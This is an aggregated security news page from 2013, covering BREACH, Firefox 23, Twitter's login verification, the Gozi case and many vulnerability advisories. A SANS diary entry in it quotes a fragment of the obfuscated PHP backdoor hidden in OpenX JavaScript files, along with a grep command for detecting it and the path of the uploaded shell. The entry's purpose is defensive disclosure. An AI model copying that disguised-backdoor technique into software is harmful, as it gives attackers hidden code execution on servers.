Hackin9

Would you want your child to grow up to work in InfoSec?
Network World (blog)
During my recent trip to Las Vegas for Black Hat I once again heard a lot of frustration from my fellow InfoSec people about the challenges of security incidents that seem to scream from our headlines every day. For a certain segment of the industry it ...

 

Last week, when Ars first reported a new hack attack that plucks e-mail addresses and certain types of security credentials out of encrypted pages, we warned the fixes wouldn't be easy. Sure enough, Web app developers responding to the attack known as BREACH have begun proposing mitigations that are awkward, if not down-right unpleasant.

The most unpalatable recommendation came from the official maintainers of Django, a popular Web framework that's perhaps second only to Ruby on Rails. In an advisory published Tuesday, they recommend website operators disable data compression in responses sent to end users. The compression, which is often considered crucial to conserve bandwidth and the time it takes browsers to load Web pages, may be turned off either by disabling Django's GZip middleware or by modifying configuration settings in the underlying Web server application.

"We plan to take steps to address BREACH in Django itself, but in the meantime we recommend that all users of Django understand this vulnerability and take action if appropriate," the advisory states.

Read 2 remaining paragraphs | Comments

    


 

The Trials of Bradley Manning
Truth-Out
There was no security to speak of at the SCIF (sensitive compartmented information facility) at FOB Hammer, where the "infosec" (information security) protocols were casually flouted with the full knowledge of supervisors. This was not an anomaly: 1.4 ...

and more »
 
More cloud vendors are adding backup to the choices they offer customers, letting enterprises that embrace the cloud for applications, computing and storage also go there for business continuity.
 
Hoping to generate more apps for its mobile platform, Microsoft has launched an online tool that could allow even non-developers to create new programs for Windows Phone 8.
 

Firefox 23, released today, contains the usual mix of security work, standards conformance improvements, and minor bug fixes that we've come to expect from the regular browser releases. On top of these, it sports a trio of changes that you might actually notice.

Most visibly of all, Firefox has a new icon. Don't worry—the lovable firefox is still embracing the globe and still has its back rudely turned towards us. The blue marble is, however, much less shiny than it once was.

The other changes are both important for their security implications. First, Firefox at last follows the lead of Internet Explorer and Chrome, blocking mixed use of (non-secure) HTTP content from (secure) HTTPS pages.

Read 7 remaining paragraphs | Comments

    


 
IBM Java CVE-2013-3009 Unspecified Arbitrary Code Execution Vulnerability
 

Chris Mohan --- Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Chris Mohan --- Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Twitter

Twitter has unveiled a new login verification feature that largely replaces the two-factor authentication system it rolled out in May to prevent a rash of password phishing attacks hitting its users.

The new system relies on strong encryption to provide iOS and Android smartphone users with an end-to-end solution that's not vulnerable to compromised SMS delivery channels. Unlike the current system, it also does away with the use of a "shared secret" between end users and Twitter, since the secrets are often just as vulnerable as passwords to phishing and other types of attacks. The cryptographic key used to approve login requests stays on a user's phone and is managed by the Twitter app itself. In addition to being more resistant to attack, the system is easier to use, company officials said.

"Now you can enroll in login verification and approve login requests right from the Twitter app on iOS and Android," Twitter security engineer Alex Smolen wrote in a blog post published Tuesday. "Simply tap a button on your phone and you're good to go. This means you don't have to wait for a text message and then type in the code each time you sign in on twitter.com."

Read 12 remaining paragraphs | Comments

    


 
According to the latest numbers from TrendForce, NAND flash sales amounted to $5.7 billion last quarter, a quarterly increase of more than 11% and a 30% year over year rise.
 
Mozilla and Google have updated their browsers with features to help developers more effectively write and debug their websites.
 
SAP has given customers a peek into how it will compete with the likes of Oracle and IBM in the growing market around CEM (customer experience management) software with the acquisition of commerce software vendor Hybris.
 
IBM will license designs of the Power microprocessor architecture to other companies including Google, in an effort to expand use of the architecture and reverse declines in its systems hardware business.
 
U.S. government agencies are exploring new ways to provide incentives for private companies to invest more money in cybersecurity, President Barack Obama's administration has announced.
 
As NASA celebrates the rover Curiosity's first year on Mars, scientists made it clear that the space agency's interest in the planet is only ramping up.
 
Re: XSS vulnerability in guestbook-php-script
 

Researchers release tool to pickup the SLAAC in Man-In-The-Middle attacks ...
Network World
Not too long after RFC 6104 was drafted, InfoSec Institute researcher Alec Waters outlined how to carry out Man-in-the-Middle (MITM) attacks via the problems with SLAAC, which gained some attention in both the media and the security community.

and more »
 
Google's new Nexus 7 tablet held up better than the iPad Mini and the original Nexus 7 in durability tests performed by Square Trade.
 
Twitter today simplified account security with an enhancement that lets customers approve two-factor authenticated log-ins from inside their iOS and Android mobile apps.
 
Facebook is tweaking its News Feed to help users spot popular posts that they might have missed.
 
There's no shortage of speculation about why Amazon founder Jeff Bezos is buying the Washington Post. It could be for access to local news, content deals involving the Amazon Kindle, political self-interest or even ego.
 
[CVE-2013-2136] Apache CloudStack Cross-site scripting (XSS) vulnerabiliity
 
The National Institute of Standards and Technology (NIST) has announced more than $2.3 million in Phase I and Phase II Small Business Innovation Research (SBIR) awards to 13 U.S. small businesses. SBIR awards provide funding to help ...
 
IBM has told U.S. employees and executives in two of its business units that they will be furloughed for one week in late August.
 
Xerox scanners have been found to randomly alter numbers on documents when reproducing them if a certain combination of image quality and compression setting is used.
 

If you installed the OpenX ad server in the past nine months, there's a chance hackers have a backdoor that gives them administrative control over your Web server, in many cases including passwords stored in databases, security researchers warned.

The hidden code in the proprietary open-source ad software was discovered by a reader of Heise Online (Microsoft Translator), a well-known German tech news site, and it has since been confirmed by researchers from Sucuri. It has gone undetected since November and allows attackers to execute any PHP code of their choice on sites running a vulnerable OpenX version.

Coca-Cola, Bloomberg, Samsung, CBS Interactive, and eHarmony are just a small sampling of companies the OpenX website lists as customers. The software company, which also sells a proprietary version of the software, has raised more than $75 million in venture capital as of February 2013.

Read 10 remaining paragraphs | Comments

    


 
Chasys Draw IES CVE-2013-3928 Multiple Remote Buffer Overflow Vulnerabilities
 
A Chinese hacker gang whose malware targeted RSA in 2011 infiltrated more than 100 companies and organizations, and even probed a major teleconference developer to find new ways to spy on corporations.
 
Ron Meyran, Radware's director of security solutions, answers our questions about DoS attack planning and execution.
 

The Latvian government says it will extradite a 28-year-old man accused of creating the Web injects for the highly destructive Gozi malware, which targeted over a million computers globally, specifically aimed at bank accounts. US prosecutors say the malware was used to steal millions of dollars from its targets.

According to the Associated Press, Latvian ministers voted Tuesday (7 to 5, with one abstention), to extradite Deniss Calovskis to the United States. Calovskis has previously denied involvement in the Gozi operation.

“I am like a hostage in this situation,” he said in an August 3 interview with Latvian television, according to Bloomberg. “I don’t know about the Gozi virus. I haven’t helped any schemers to get money and I haven’t received any.”

Read 3 remaining paragraphs | Comments

    


 
[ MDVSA-2013:209 ] subversion
 
LinuxSecurity.com: A vulnerability has been found and corrected in subversion: The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) [More...]
 
LinuxSecurity.com: Updated libtiff packages fix security vulnerabilities: A heap-based buffer overflow flaw was found in the way tiff2pdf of libtiff performed write of TIFF image content into particular PDF document file, in the tp_process_jpeg_strip() function. A remote [More...]
 
LinuxSecurity.com: A vulnerability has been found and corrected in samba: Integer overflow in the read_nttrans_ea_list function in nttrans.c in smbd in Samba 3.x before 3.5.22, 3.6.x before 3.6.17, and 4.x before 4.0.8 allows remote attackers to cause a denial of service [More...]
 
LinuxSecurity.com: New bind packages are available for Slackware 12.1, 12.2, 13.0, 13.1, 13.37, 14.0, and -current to fix a security issue. [More Info...]
 
LinuxSecurity.com: New samba packages are available for Slackware 13.1, 13.37, 14.0, and -current to fix a security issue. [More Info...]
 
LinuxSecurity.com: New httpd packages are available for Slackware 12.1, 12.2, 13.0, 13.1, 13.37, 14.0, and -current to fix security issues. [More Info...]
 
Joomla! 'lang' Parameter Cross-Site Scripting Vulnerability
 
[ MDVSA-2013:208 ] libtiff
 
Multiple Cisco Products CVE-2013-0149 Remote Security Bypass Vulnerability
 
Opscode's Chef packs the power of Ruby and plentiful Cookbooks, but lacks features and polish found in other solutions
 
When the CIA opted to have Amazon build its private cloud, even though IBM could do it for less money, a tech soap opera ensued. Lost amid the drama, though, is a perfectly reasonable explanation why Amazon Web Services makes sense for the CIA--and why a disruptive AWS represents the future of the cloud.
 

Would you want your child to grow up to work in InfoSec?
Network World
During my recent trip to Las Vegas for Black Hat I once again heard a lot of frustration from my fellow InfoSec people about the challenges of security incidents that seem to scream from our headlines every day. For a certain segment of the industry it ...

 
[ MDVSA-2013:207 ] samba
 

Wisegate offers CISOs vendor management tips
HealthITSecurity.com
A Director of InfoSec from a Fortune 100 company said that the market has essentially become saturated and it's a chore dealing with a large number of vendors that may have different specialties. “I counted up the different vendors and we had over 40 ...

 
Reacting to reports of at least one death in China linked to a counterfeit power adaptor, Apple on Monday announced a program that discounts authentic replacements by nearly 50%.
 
A tailored LinkedIn application is now available for the Nokia Asha 501 as well as a number of other Asha devices, as Nokia works to expand the social capabilities of the phone range.
 
Enterprises that rely on cloud-based services are getting more options for falling back on another cloud if necessary.
 
Amazon has launched Amazon Art, a marketplace that includes more than 40,000 works of art by the likes of Norman Rockwell and Claude Monet from over 150 galleries and dealers.
 
Samba CVE-2013-4124 Local Denial of Service Vulnerability
 
Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
 

According to a post by Heise Security, a backdoor has been spotted in the popular open source ad software OpenX [1][2]. Appearantly the backdoor has been present since at least November 2012. I tried to download the source to verify the information, but it appears the files have been removed. 

The backdoor is disguised as php code that appears to create a jQuery javascript snippet:

this.each(function(){l=flashembed(this,k,j)}<!--?php /*if(e)
{jQuery.tools=jQuery.tools||{version:
{}};jQuery.tools.version.flashembed='1.0.2'; 
*/$j='ex'./**/'plode'; /* if(this.className ...

Heise recommends to search the ".js" files of OpenX for php code to find out if your version of OpenX is the backdoored version.

find . -name \*.js -exec grep -l '<?php' {} \;

The backdoor can then be used by an attacker to upload a shell to www/images/debugs.php . We have seen in the past several web sites that delivered malicious ads served by compromissed ad servers. This could be the reason for some of these compromisses. 

If you run OpenX:

  • verify the above information (and let us know)
  • if you can find the backdoor, disable/ininstall OpenX
  • make sure you remove the "debug.php" file
  • best: rebuild the server if you can

Heise investigated a version 2.8.10 of OpenX with a data of December 9th and an md5 of 6b3459f16238aa717f379565650cb0cf for the openXVideoAds.zip file.

[1] http://www.heise.de/newsticker/meldung/Achtung-Anzeigen-Server-OpenX-enthaelt-eine-Hintertuer-1929769.html (only in German at this point)
[2] http://www.openx.com

------ 
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter @johullrich

 

 

 

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
IBM has introduced x86 and Power processors with a new dual-chip server module that will help speed the deployment of cloud and virtualized environments.
 
BMC is continuing its push into the consumerization-of-IT trend with the acquisition of Partnerpedia, which makes software companies can use to roll out secure, governed app stores to their end users. Terms of the deal, which closed last month, were not revealed.
 
The TOR Project is advising that people stop using Windows after the discovery of a startling vulnerability in Firefox that undermined the main advantages of the privacy-centered network.
 
Apple saw a dip in its smartphone market share in China as the company was overtaken by local rival Xiaomi, a seller of low-priced handsets that has been making waves in the country's tech industry.
 
[slackware-security] bind (SSA:2013-218-01)
 
[slackware-security] samba (SSA:2013-218-03)
 
[slackware-security] httpd (SSA:2013-218-02)
 
After one year on Mars, the NASA rover Curiosity is changing the way we look at our solar system -- and it may change how we look at ourselves.
 
The largest supercomputer in the world may be a top secret, as the specs of U.S. spy agencies are classified. Nonetheless the top U.S. spy agency is publicly seeking help to build superconducting computers, which may offer the best path to exascale.
 
SocialEngine 4.5 TimeLine 4.2.5p9 upload file "PHP" in the Cover Image
 
Usernoise 3.7.8 WP plugin cross-site scripting vulnerability
 
Re: Joomla core <= 3.1.5 reflected XSS vulnerability
 
[SECURITY] [DSA 2734-1] wireshark security update
 
Multiple Schneider Electric Products XML External Entity Information Disclosure Vulnerability
 

Hacker Halted USA to Feature Top Industry Keynotes & Over 50 Hacking Experts ...
PR Web (press release)
EC-Council's premier security event, Hacker Halted USA, brings infosec professionals from across industries, around the world, and at all levels to converge in one event to discuss the biggest threats to the world's cybersecurity. From hackers to ...

and more »
 
Internet Storm Center Infocon Status